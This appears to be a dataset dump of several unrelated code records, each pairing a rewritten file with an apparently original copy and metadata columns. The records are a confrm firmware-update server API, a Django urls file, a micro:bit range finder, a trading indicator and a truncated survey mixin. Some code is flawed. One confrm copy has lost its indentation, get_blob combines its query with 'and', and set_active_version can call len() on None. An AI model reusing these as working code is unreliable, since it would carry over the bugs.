        msg = f"Package name does not match pattern {pattern}"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-010",
            "message": msg,
            "detail": "While attempting to add a new package the package name did not match the"
            f" pattern {pattern}"
        }
    # Default the display title to the package name
    if not package.title:
        package.title = package.name
    packages = DB.table("packages")
    query = Query()
    existing_name = packages.get(query.name == package_dict["name"])
    if existing_name is not None:
        msg = "Package already exists"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-003",
            "message": msg,
            "detail": "While attempting to add a new package to the database a package with this " +
            "name was found to already exist"
        }
    packages.insert(package_dict)
    return {}
@APP.delete("/package/", status_code=status.HTTP_200_OK)
async def delete_package(name: str, response: Response):
    """Delete a package, its versions and all configs

    Attributes:
        name (str): Package to be deleted
        response (Response): Starlette response object
    """
    query = Query()
    packages = DB.table("packages")
    package_versions = DB.table("package_versions")
    configs = DB.table("config")
    (package_doc, status_code, err) = package_exists(name)
    if package_doc is None:
        response.status_code = status_code
        return err
    # Get all the package versions associated with this package and delete
    # them one by one (delete_package_version also removes stored blobs)
    _versions = package_versions.search(query.name == name)
    for version in _versions:
        version_str = str(version["major"]) + "." + \
            str(version["minor"]) + "." + \
            str(version["revision"])
        await delete_package_version(name, version_str, response)
    # Get all the configs associated with this package and cascade-delete
    _configs = configs.search((query.type == "package") &
                              (query.id == name))
    for config in _configs:
        await delete_config(key=config["key"], type="package", response=response, id=name)
    packages.remove(doc_ids=[package_doc.doc_id])
    return {}
@APP.post("/package_version/", status_code=status.HTTP_201_CREATED)
async def add_package_version(
        response: Response,
        package_version: PackageVersion = Depends(),
        set_active: bool = False,
        canary_next: bool = False,
        canary_id: str = "",
        file: bytes = File(...)):
    """Uploads a package version with binary package

    Arguments:
        response (Response): Starlette response object for setting return codes
        package_version (PackageVersion): Package description
        set_active (bool): Default False, if true this version will be set active
        canary_next (bool): if true the next node to check for updates becomes the canary
        canary_id (str): node id to force onto this version as canary
        file (bytes): File uploaded
    """
    package_version_dict = package_version.__dict__
    packages = DB.table("packages")
    package_versions = DB.table("package_versions")
    query = Query()
    (package_doc, status_code, err) = package_exists(
        package_version_dict["name"])
    if package_doc is None:
        response.status_code = status_code
        return err
    if canary_id:
        # A named canary node must already be registered
        nodes = DB.table("nodes")
        node_doc = nodes.get(query.node_id == canary_id)
        if not node_doc:
            msg = "Node not found"
            logging.info(msg)
            response.status_code = status.HTTP_404_NOT_FOUND
            return {
                "error": "confrm-026",
                "message": msg,
                "detail": "While attempting to add a new package version the node " +
                " given was not found"
            }
    # Version numbers must be unique per package
    existing_version = package_versions.get((query.name == package_version_dict["name"]) &
                                            (query.major == package_version_dict["major"]) &
                                            (query.minor == package_version_dict["minor"]) &
                                            (query.revision == package_version_dict["revision"]))
    if existing_version is not None:
        msg = "Version already exists for package"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-006",
            "message": msg,
            "detail": "While attempting to add a new package version the version given " +
            " was found to be already used"
        }
    if package_version_dict["major"] < 0 or \
       package_version_dict["minor"] < 0 or \
       package_version_dict["revision"] < 0:
        msg = "Version number elements cannot be negative"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-017",
            "message": msg,
            "detail": "While attempting to add a new package version the version given " +
            " was found to contain negative numbers"
        }
    # Package was uploaded, create hash of binary (recorded so downloads
    # can be integrity-checked in get_blob)
    _h = SHA256.new()
    _h.update(file)
    # Store the binary in the data_store as a base64 encoded file under a
    # random blob id
    filename = uuid.uuid4().hex
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    save_file = os.path.join(blob_dir, filename)
    with open(save_file, "wb") as ptr:
        ptr.write(base64.b64encode(file))
    # Escape the strings
    for key in package_version_dict.keys():
        if isinstance(package_version_dict[key], str):
            package_version_dict[key] = escape(package_version_dict[key])
    # Update with blob details
    package_version_dict["date"] = round(time.time())
    package_version_dict["hash"] = _h.hexdigest()
    package_version_dict["blob_id"] = filename
    # Store in the database
    package_versions.insert(package_version_dict)
    version_str = str(package_version_dict["major"]) + "." + \
        str(package_version_dict["minor"]) + "." + \
        str(package_version_dict["revision"])
    if set_active is True:
        package_doc["current_version"] = version_str
        packages.update(package_doc, query.name == package_doc["name"])
    # If this is being set to active, or a canary, delete existing canaries
    if set_active is True or canary_id or canary_next is True:
        try:
            remove_canary(package=package_doc["name"])
        except ValueError as err:
            if str(err) != "Canary Not Found":
                raise
    if canary_id:
        # Force the named node onto this version
        set_canary(node_id=canary_id,
                   package=package_doc["name"],
                   version=version_str)
    if canary_next:
        # "*" is the wildcard canary id: the next node to check for updates
        # is adopted as the canary (see check_for_update)
        set_canary(node_id="*",
                   package=package_doc["name"],
                   version=version_str)
    return {}
@APP.delete("/package_version/", status_code=status.HTTP_200_OK)
async def delete_package_version(package: str, version: str, response: Response):
    """ Delete a package version

    Attributes:
        package (str): Package with version to be deleted
        version (str): Version to be deleted
        response (Response): Starlette response object
    """
    (package_doc, status_code, err) = package_exists(package)
    if package_doc is None:
        response.status_code = status_code
        return err
    package_versions = DB.table("package_versions")
    version_entry = get_package_version_by_version_string(package, version)
    if version_entry is None:
        msg = "Package version not found"
        logging.info(msg)
        response.status_code = status.HTTP_404_NOT_FOUND
        return {
            "error": "confrm-020",
            "message": msg,
            "detail": "While attempting to delete a package version the version specified" +
            " was not found"
        }
    package_versions.remove(doc_ids=[version_entry.doc_id])
    # Remove the stored blob from disk as well.
    # NOTE(review): os.remove raises FileNotFoundError if the blob file is
    # already gone -- confirm whether that should be tolerated
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    file_path = os.path.join(blob_dir, version_entry["blob_id"])
    os.remove(file_path)
    # Check for any hanging canary entries
    try:
        remove_canary(package=package)
    except ValueError as err:
        if str(err) != "Canary Not Found":
            raise
    # Deleting the currently active version leaves the package with no
    # active version -- report a warning rather than an error
    if "current_version" in package_doc.keys() and package_doc["current_version"] == version:
        msg = "Active version is not set"
        logging.info(msg)
        response.status_code = status.HTTP_200_OK
        return {
            "warning": "confrm-021",
            "message": msg,
            "detail": "While deleting a package version the version specified was set as the"
            " current active version. The package version was deleted and the active version "
            f" for package {package} is now not set"
        }
    return {}
@APP.get("/package/", status_code=status.HTTP_200_OK)
async def get_package(name: str, response: Response, lite: bool = False):
    """ Returns the package information, including URL for download """
    (package_doc, status_code, err) = package_exists(name)
    if package_doc is not None:
        return format_package_info(package_doc, lite)
    response.status_code = status_code
    return err
@APP.get("/check_for_update/", status_code=status.HTTP_200_OK)
async def check_for_update(package: str, node_id: str, response: Response):
"""Called by node wanting to know if an update is available
Will return the most recent package version for the given package name.
Will check to see if a canary entry has been made for the node, if it is then
the be canary settings will be returned.
Arguments:
package (str): Package to check for update for
node_id (str): Id of the node making the request, or empty
response (Response): Starlette response object for setting return codes
Returns:
HTTP_200_OK / {"current_version": ..., "blob": ...} if found
HTTP_404_NOT_FOUND / Message header / {} if not found
"""
packages = DB.table("packages")
nodes = DB.table("nodes")
query = Query()
# Precedence is, node force, package canary then package version
node_doc = nodes.get(query.node_id == node_id)
if node_doc and "force" in node_doc.keys():
version_doc = get_package_version_by_version_string(
node_doc["force"]["package"],
node_doc["force"]["version"]
)
if version_doc is None:
# TODO Create test
logging.error("Force version not set, removing force entry...")
nodes.update(delete("force"), query.node_id == node_id)
else:
return {
"current_version": node_doc["force"]["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": True
}
package_canary = get_canary(package=package)
if package_canary is not None and package_canary["node_id"] == "*":
set_canary(node_id=node_id, package=package,
version=package_canary["version"])
# Check to see if there is a canary entry for this node
canary = get_canary(node_id=node_id)
if canary is not None:
version_doc = get_package_version_by_version_string(
canary["package"],
canary["version"]
)
if version_doc is None:
# TODO: Create test
logging.error("Canary version not set, removing canary entry...")
remove_canary(node_id=node_id)
else:
return {
"current_version": canary["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": canary["force"]
}
package_doc = packages.get(query.name == package)
if package_doc is None:
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-000",
"message": "Package not found",
"detail": "Package not found"
}
if "current_version" in package_doc.keys():
version_entry = get_package_version_by_version_string(
package,
package_doc["current_version"])
return {
"current_version": package_doc["current_version"],
"blob": version_entry["blob_id"],
"hash": version_entry["hash"],
"force": False
}
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-011",
"message": "No versions found for package",
"detail": "While checking for updates the package was found in the database, " +
"however there are no available versions of that package"
}
@APP.put("/set_active_version/")
async def set_active_version(package: str, version: str):
""" Set the active version via the API """
# TODO: Set error codes
query = Query()
packages = DB.table("packages")
package_entry = packages.get(query.name == package)
if package_entry is None:
return {"ok": False, "info": "Package does not exist"}
version_doc = get_package_version_by_version_string(package, version)
if len(version_doc) < 1:
return {"ok": False, "info": "Specified version does not exist for package"}
package_entry["current_version"] = version
result = packages.update(package_entry, query.name == package)
try:
remove_canary(package=package)
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if len(result) > 0:
return {"ok": True}
return {"ok": False}
@APP.put("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, package: str, response: Response, version: str = ""):
"""Force a node to use a particular package"""
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
if not version:
if not package_doc["current_version"]:
msg = "Package has no active version"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-008",
"message": msg,
"detail": "While attempting to set a node to use a particular package the package" +
" was found to have no active versions and no specific version was given"
}
version = package_doc["current_version"]
else:
version_doc = get_package_version_by_version_string(package, version)
if version_doc is None:
msg = "Package version not found"
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-002",
"message": msg,
"detail": "While attempting to set a node to use a particular package the " +
" version given was not found"
}
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
node_doc["force"] = {
"package": package,
"version": version
}
nodes = DB.table("nodes")
query = Query()
nodes.update(node_doc, query.node_id == node_id)
return {}
@APP.delete("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, response: Response):
"""Delete entry forcing a node to use a particular package"""
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
if "force" not in node_doc.keys():
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-007",
"message": "Node does not have a force package entry",
"detail": "While attempting to remove a package forcing entry for node" +
f" {node_id} no node forcing entry was found"
}
nodes = DB.table("nodes")
query = Query()
nodes.update(delete("force"), query.node_id == node_id)
return {}
@APP.get("/blob/", status_code=status.HTTP_200_OK)
async def get_blob(package: str, blob: str, response: Response):
""" Set a blob file """
query = Query()
package_versions = DB.table("package_versions")
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
version_entry = package_versions.get(
query.name == package and
query.blob_id == blob)
if version_entry is None:
return {"ok": False, "info": "Specified blob does not exist for package"}
# Read the file from the data store
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
with open(os.path.join(blob_dir, blob), "rb") as ptr:
data = base64.b64decode(ptr.read())
# Create sha256 of data from store
_h = SHA256.new()
_h.update(data)
# Check hash against original
if version_entry["hash"] != _h.hexdigest():
print("Hashes do not match...")
return
return ConfrmFileResponse(data)
@APP.put("/config/", status_code=status.HTTP_201_CREATED)
async def put_config(type: str, key: str, value: str, response: Response, id: str = ""):
"""Adds new config to the config database
Attributes:
type (str): One of global, package or node
id (str): Empty, package name or node_id
key (str): Key to be stored
value (str): Value to be stored
"""
query = Query()
config = DB.table("config")
types = ["global", "package", "node"]
if not type or type not in types:
msg = "Type cannot be empty and must be a valid type"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-015",
"message": msg,
"detail": "While attempting to add a new config the type of config given was empty"
" or was incorrect."
}
pattern = '^[0-9a-zA-Z_-]+$'
regex = re.compile(pattern)
if regex.match(key) is None:
msg = f"Key name does not match pattern {pattern}"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-016",
"message": msg,
"detail": "While attempting to add a new config the key given did not match the"
f" pattern {pattern}"
}
if type == "global":
key_doc = config.get((query.key == key) & (query.type == "global"))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "package":
(package_doc, status_code, err) = package_exists(id)
if package_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "package") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "node":
(node_doc, status_code, err) = node_exists(id)
if node_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "node") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
return {}
@APP.get("/config/", status_code=status.HTTP_200_OK)
async def get_config(response: Response, key: str = "", package: str = "", node_id: str = ""):
"""Get configuration value from database
Attributes:
key (str): Key to retrieve
response (Response): Starlette response object
package (str): Package of requesting node
node_id (str): node_id of requesting node
"""
query = Query()
config = DB.table("config")
if node_id:
(doc, status_code, err) = node_exists(node_id)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "node") &
(query.id == node_id) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if package:
(doc, status_code, err) = package_exists(package)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "package") &
(query.id == package) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if not key:
# Do deepcopy to save changing database by accident
configs = deepcopy(config.all())
packages = DB.table("packages")
nodes = DB.table("nodes")
for config in configs:
if config["type"] == "package":
package_doc = packages.get(query.name == config["id"])
if package_doc is not None:
config["package_title"] = package_doc["title"]
elif config["type"] == "node":
node_doc = nodes.get(query.node_id == config["id"])
if node_doc is not None:
config["node_title"] = node_doc["title"]
return sort_configs(configs)
# Must be global...
doc = config.get((query.type == "global") &
(query.key == key))
if doc is None:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-012",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{package}\""
" / node \"{node_id}\""
}
return {"value": doc["value"]}
@APP.delete("/config/", status_code=status.HTTP_200_OK)
async def delete_config(key: str, type: str, response: Response, id: str = ""):
"""Delete a config from the database
Attributes:
key (str): key to be deleted
type (str): global/package/node
id (str): package or node id as per type
response (Response): Starlette response object
"""
query = Query()
config = DB.table("config")
if type == "global":
global_doc = config.get((query.key == key) &
(query.type == "global"))
if global_doc is not None:
config.remove(doc_ids=[global_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found, unable to delete it"
}
elif type == "package":
package_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "package"))
if package_doc is not None:
config.remove(doc_ids=[package_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{id}\","
" unable to delete it"
}
elif type == "node":
node_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "node"))
if node_doc is not None:
config.remove(doc_ids=[node_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for node \"{id}\","
" unable to delete it"
}
return {}
|
en
| 0.735254
|
Main FastAPI Implementation of confrm Copyright 2020 confrm.io Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Codes: 000 ERROR - - Package not found 001 ERROR - - Node not found 002 ERROR - - Package version not found 003 ERROR PUT /package/ Package already exists 004 ERROR PUT /package/ Package name cannot be empty 005 ERROR PUT /register_node/ Node id is invalid 006 ERROR PUT /package_version/ Version already exists for package 007 ERROR DELETE /node_package/ Node does not have a force package entry 008 ERROR PUT /node_package/ Package has no active version 009 010 ERROR PUT /package/ Package name does not match pattern 011 ERROR GET /check_for_update/ No versions found for package 012 ERROR GET /config/ Key not found 013 014 015 016 ERROR PUT /config/ Key name does not match pattern 017 ERROR POST /package_version/ Version numbers cannot be negative 018 ERROR PUT /node_package/ Package version not found 019 020 ERROR DELETE /package_version/ Package version not found 021 WARNING DELETE /package_version/ Active version not set 022 ERROR PUT /node_title/ Node does not exist 023 ERROR PUT /node_title/ Node title is too long 024 ERROR DELETE /config/ Key not found 025 026 ERROR POST /package_version/ Canary node not found 027 028 029 # pylint: disable=E0611 # pydantic data models are used to describe the inputs for the various REST # API calls, if the calls do not match these names and data-types then the call # to FastAPI will fail # pylint: disable=R0903 Definition of a package # pylint: disable=R0903 
Definition of a package version Gets the config based on an environment variable and sets up global objects as required # pylint: disable=W0603 # Create the database from the data store # Check a blob folder exists Handles the version ordering logic Versions are sorted to be in descending order, with the currently active version at the top of the list (position 0) Attributes: name (str): package name string package ({}): [Optional] package dict, saves looking up the entry again Formats data in to correct dict form Can generate long form (for UI) or short form / lite (for nodes) Attributes: package (dict): package dict from DB lite (bool): if true a reduced response is generated # Minimal data for lite implementation Get package version using string name and string version number # pylint: disable=R0912 Sort configs by global/package/node, then by package name, then by node name Attributes: configs (list): List of config dicts # Find all unique keys and sort alphabetically # For each key find globals, then packages, then nodes # Sort the package end node elements alphabetically Creates an entry in the canary table for this node. If the node already exists then the previous entry will be deleted, and if an entry for the package already exists then that will be deleted. There can only be one entry per package and per node. 
Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to version (str): Version of package the node will be set to # Check for existing node entry and delete if it exists # Check for existing entries for the given package, delete if exists # Insert new entry, force is set to True, once the node has been updated Removes the given package or node canary entry Exceptions: ValueError("Canary Not Found") Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to Checks if a canary exists for given package or node_id Exceptions: ValueError("Input Not Set") Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to Returns: None: No entry found TinyDB Document: Found entry Checks if package exists, returns tuple of (package_doc, status, error_dict) Attributes: packages (str): Package to search for Checks if node exists, returns tuple of (node_doc, status, error_dict) Attributes: packages (str): Package to search for # Files server in /static will point to ./dashboard (with respect to the running # script) Is called on application startup Is called on application shutdown Returns index page for UI Get basic info for UI elements Returns time of day from server as unix epoch time Helper to read back the canary status for a node Attributes: node_id (str): The node id to check against response (Response): Starlette response object for setting return codes # pylint: disable=R0913 Registers a node to the server Attributes: node_id (str): The node id, must be unique, MAC addresses work well package (str): Package installed on the node version (str): Version string of currently running package description (str): Description of package platform: (str): Platform type (i.e. 
esp32) request (Request): Starlette request object for getting client information response (Response): Starlette response object for setting return codes Returns: HTTP_200_OK HTTP_404_NOT_FOUND # Make sure input is sane # Asterisk is not allowed! # Update the package entry based on package name change, new version of a package # and register this as the last update time # Package changed # Version of package changed # Check if force package change # Check to see if a canary Returns a list of nodes, if package is set the only return nodes using that package, if a node is set then return the doc for that node. Attributes: package (str): name of package to return node list for # Make a new copy of list so we can make changes to elements for display layer without # changing the values in the database Sets the title of a node Attributes: package (str): name of package to return node list for Get package list and process for displaying on the UI # Packages contains a RAW list of packages, should process them down for # the UI - unique 'name' fields, with multiple 'versions' Add package description Attributes: package (Package): Package description to be added # Update storage record to include the local information # Escape the strings Delete a package, its versions and all configs Attributes: name (str): Package to be deleted response (Response): Starlette response object # Get all the package versions associated with this package # Get all the configs associated with this package Uploads a package version with binary package Arguments: response (Response): Starlette response object for setting return codes package_version (PackageVersion): Package description set_active (bool): Default False, if true this version will be set active file (bytes): File uploaded # Package was uploaded, create hash of binary # Store the binary in the data_store as a base64 encoded file # Escape the strings # Update with blob details # Store in the database # If this is begin set to active, 
or a canary, delete existing canaries Delete a package version Attributes: package (str): Package with version to be deleted version (str): Version to be deleted response (Response): Starlette response object # Check for any hanging canary entries Returns the package information, including URL for download Called by node wanting to know if an update is available Will return the most recent package version for the given package name. Will check to see if a canary entry has been made for the node, if it is then the be canary settings will be returned. Arguments: package (str): Package to check for update for node_id (str): Id of the node making the request, or empty response (Response): Starlette response object for setting return codes Returns: HTTP_200_OK / {"current_version": ..., "blob": ...} if found HTTP_404_NOT_FOUND / Message header / {} if not found # Precedence is, node force, package canary then package version # TODO Create test # Check to see if there is a canary entry for this node # TODO: Create test Set the active version via the API # TODO: Set error codes Force a node to use a particular package Delete entry forcing a node to use a particular package Set a blob file # Read the file from the data store # Create sha256 of data from store # Check hash against original Adds new config to the config database Attributes: type (str): One of global, package or node id (str): Empty, package name or node_id key (str): Key to be stored value (str): Value to be stored # TODO: Warning for updating, including from and to values # TODO: Warning for updating, including from and to values # TODO: Warning for updating, including from and to values Get configuration value from database Attributes: key (str): Key to retrieve response (Response): Starlette response object package (str): Package of requesting node node_id (str): node_id of requesting node # Do deepcopy to save changing database by accident # Must be global... 
Delete a config from the database Attributes: key (str): key to be deleted type (str): global/package/node id (str): package or node id as per type response (Response): Starlette response object
| 1.88511
| 2
|
web/accounts/urls.py
|
GuillaumeCaillou/carbure
| 0
|
6628522
|
from django.urls import path
from . import views
# Account-management routes: the user profile page plus the custom
# password-change flow (change form and its success page).
urlpatterns = [
    path('profile', views.profile, name='profile'),
    path('password_change', views.custom_password_change, name='custom_password_change'),
    path('password_change_success', views.custom_password_change_success, name='custom_password_change_success'),
]
|
from django.urls import path
from . import views
urlpatterns = [
path('profile', views.profile, name='profile'),
path('password_change', views.custom_password_change, name='custom_password_change'),
path('password_change_success', views.custom_password_change_success, name='custom_password_change_success'),
]
|
none
| 1
| 1.63212
| 2
|
|
ultrasonic-sensor/range-finder.py
|
lyneca/microbit-demos
| 0
|
6628523
|
'An example range-finder using an ultrasonic sensor and the 25 leds'
from microbit import *
import machine
import time
# HC-SR04 wiring: trigger output on pin0, echo input on pin1
TRIGGER = pin0
ECHO = pin1
# Read the echo pin once and clear its pull resistor before timing pulses
# (presumably read_digital puts the pin into digital-input mode - confirm
# against the micro:bit pin API)
ECHO.read_digital()
ECHO.set_pull(ECHO.NO_PULL)
def read_distance_cm(trigger_pin, echo_pin):
    '''
    Get distance in cm from an object using HC-SR04 ultrasonic sensor.
    The sensor requires 5V in (doesn't operate properly on 3v).
    Use voltage divider to lower ECHO signal to 3v.
    Use a delay of at least 60ms between calls to read_distance.
    Returns None if no echo pulse completes within the timeout.
    '''
    # Emit the 10us trigger pulse (settle low, drive high, back low)
    trigger_pin.write_digital(0)
    time.sleep_us(2)
    trigger_pin.write_digital(1)
    time.sleep_us(10)
    trigger_pin.write_digital(0)
    time.sleep_us(10)
    # 60000us timeout (max about 400cm). A larger timeout will make it
    # possible to detect larger distances.
    pulse_width = machine.time_pulse_us(echo_pin, 1, 60000)
    if pulse_width < 0:
        # No full pulse detected before timeout
        return None
    # Divide by 58 to get centimetres as per spec
    return pulse_width / 58
# Poll the sensor forever, lighting a number of LEDs proportional to the
# measured distance (0 to 200cm); treat a timeout (None) as maximum range.
while True:
    distance = read_distance_cm(TRIGGER, ECHO) or 400
    lit = 25 * min(distance / 200, 1.0)
    pattern = ''
    for row in range(5):
        pattern += ''.join(str(9 if row * 5 + col < lit else 0) for col in range(5)) + ':'
    display.show(Image(pattern))
    sleep(60)
|
'An example range-finder using a ultrasonic sensor and the 25 leds'
from microbit import *
import machine
import time
TRIGGER = pin0
ECHO = pin1
ECHO.read_digital()
ECHO.set_pull(ECHO.NO_PULL)
def read_distance_cm(trigger_pin, echo_pin):
'''
Get distance in cm from an object using HC-SR04 ultrasonic sensor.
The sensor requires 5V in (doesn't operate properly on 3v).
Use voltage divider to lower ECHO signal to 3v.
Use a delay of at least 60ms between calls to read_distance.
'''
trigger_pin.write_digital(0)
time.sleep_us(2)
trigger_pin.write_digital(1)
time.sleep_us(10)
trigger_pin.write_digital(0)
time.sleep_us(10)
# 60000us timeout (max about 400cm). A larger timeout will make it possible to detect larger distances
pw = machine.time_pulse_us(echo_pin, 1, 60000)
if pw < 0:
# No full pulse detected before timeout
return None
else:
# Divide by 58 to get centimetres as per spec
return pw/58
while True:
# Read the distance and colour a number of leds proportional to the distance (from 0 to 200cm)
d = read_distance_cm(TRIGGER, ECHO) or 400
leds = 25*min(d/200, 1.0)
image = Image(''.join(''.join(str(9 if y*5+x < leds else 0) for x in range(5)) + ':' for y in range(5)))
display.show(image)
sleep(60)
|
en
| 0.870252
|
Get distance in cm from an object using HC-SR04 ultrasonic sensor. The sensor requires 5V in (doesn't operate properly on 3v). Use voltage divider to lower ECHO signal to 3v. Use a delay of at least 60ms between calls to read_distance. # 60000us timeout (max about 400cm). A larger timeout will make it possible to detect larger distances # No full pulse detected before timeout # Divide by 58 to get centimetres as per spec # Read the distance and colour a number of leds proportional to the distance (from 0 to 200cm)
| 3.459886
| 3
|
Indicators/double_weighted_moving_average.py
|
Desil-sketch/Indicators-for-Jesse
| 1
|
6628524
|
from jesse.helpers import get_candle_source, slice_candles, np_shift
import numpy as np
from numba import njit
import talib
from typing import Union
from jesse.helpers import get_config, same_length, get_candle_source, slice_candles, np_shift
from collections import namedtuple
'''
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
'''
def dwma(candles: np.ndarray, length: int= 14, source_type: str = "close", sequential: bool = False ) -> Union[float, np.ndarray]:
    """Double Weighted Moving Average: a WMA applied twice for extra smoothing.

    Returns the full series when sequential, otherwise the latest value.
    """
    candles = slice_candles(candles, sequential)
    src = get_candle_source(candles, source_type=source_type)
    smoothed = talib.WMA(talib.WMA(src, length), length)
    return smoothed if sequential else smoothed[-1]
|
from jesse.helpers import get_candle_source, slice_candles, np_shift
import numpy as np
from numba import njit
import talib
from typing import Union
from jesse.helpers import get_config, same_length, get_candle_source, slice_candles, np_shift
from collections import namedtuple
'''
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
'''
def dwma(candles: np.ndarray, length: int= 14, source_type: str = "close", sequential: bool = False ) -> Union[float, np.ndarray]:
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
dwma = talib.WMA(talib.WMA(source,length),length)
if sequential:
return dwma
else:
return dwma[-1]
|
en
| 0.530815
|
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
| 2.5315
| 3
|
survey/mixins/categorical_group_mixin.py
|
vahndi/quant-survey
| 2
|
6628525
|
<gh_stars>1-10
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from typing import List, Union, Dict, Optional, Tuple, Any
from survey.mixins.data_types.categorical_mixin import CategoricalMixin
class CategoricalGroupMixin(object):
    """Mixin for groups of categorical questions: shared category metadata
    plus grid plotting of distributions and comparisons."""

    # Categorical questions in the group; set by the consuming class
    items: List[CategoricalMixin]

    def _set_categories(self):
        """
        Set the Categories for the Group if all Categoricals in the Group have
        the same Categories, otherwise set them to None.
        """
        ref_names = set(self.items[0].category_names)
        all_names = set([
            category_name for item in self.items
            for category_name in item.category_names
        ])
        if ref_names == all_names:
            self._categories = self.items[0].categories
        else:
            self._categories = None

    @property
    def categories(self) -> Optional[Union[List[str], Dict[str, int]]]:
        """
        Return the categories (a list of names, or a name -> value mapping).
        """
        return self._categories

    @property
    def category_names(self) -> Optional[List[str]]:
        """
        Return the names of the categories, or None if the group's items do
        not share a common category set.
        """
        if isinstance(self._categories, list):
            return self._categories
        elif isinstance(self._categories, dict):
            return list(self._categories.keys())
        else:
            return None

    @property
    def category_values(self) -> Optional[list]:
        """
        Return the values of the categories, or None if the group's items do
        not share a common category set.
        """
        if isinstance(self._categories, list):
            return self._categories
        elif isinstance(self._categories, dict):
            return list(self._categories.values())
        else:
            return None

    def _share_x(self) -> str:
        """Return 'all' when every item has the same categories (so grid axes
        can be shared), otherwise 'none'.

        BUG FIX: this logic previously read ``self._questions``, an attribute
        that does not exist on this mixin (the attribute is ``items``), which
        raised AttributeError as soon as either plot method was called.
        """
        categories = set(self.items[0].categories)
        for item in self.items[1:]:
            if set(item.categories) != categories:
                return 'none'
        return 'all'

    def _annotate_axes(self, ax, index: int, item,
                       titles: Union[str, List[str], Dict[str, str]],
                       x_labels: Union[str, List[str], Dict[str, str]]):
        """Apply the title and x-label for one grid cell.

        ``titles`` / ``x_labels`` may each be a single string, a list indexed
        by grid position, or a dict keyed by question name or group key.
        """
        if isinstance(titles, str):
            ax.set_title(titles)
        elif isinstance(titles, list):
            ax.set_title(titles[index])
        elif isinstance(titles, dict):
            if item.name in titles.keys():
                ax.set_title(titles[item.name])
            elif self.find_key(item) in titles.keys():
                ax.set_title(titles[self.find_key(item)])
        if isinstance(x_labels, str):
            ax.set_xlabel(x_labels)
        elif isinstance(x_labels, list):
            ax.set_xlabel(x_labels[index])
        elif isinstance(x_labels, dict):
            if item.name in x_labels.keys():
                ax.set_xlabel(x_labels[item.name])
            # BUG FIX: membership was previously tested against `titles`
            # before indexing `x_labels`, which could raise KeyError or
            # silently skip a valid label
            elif self.find_key(item) in x_labels.keys():
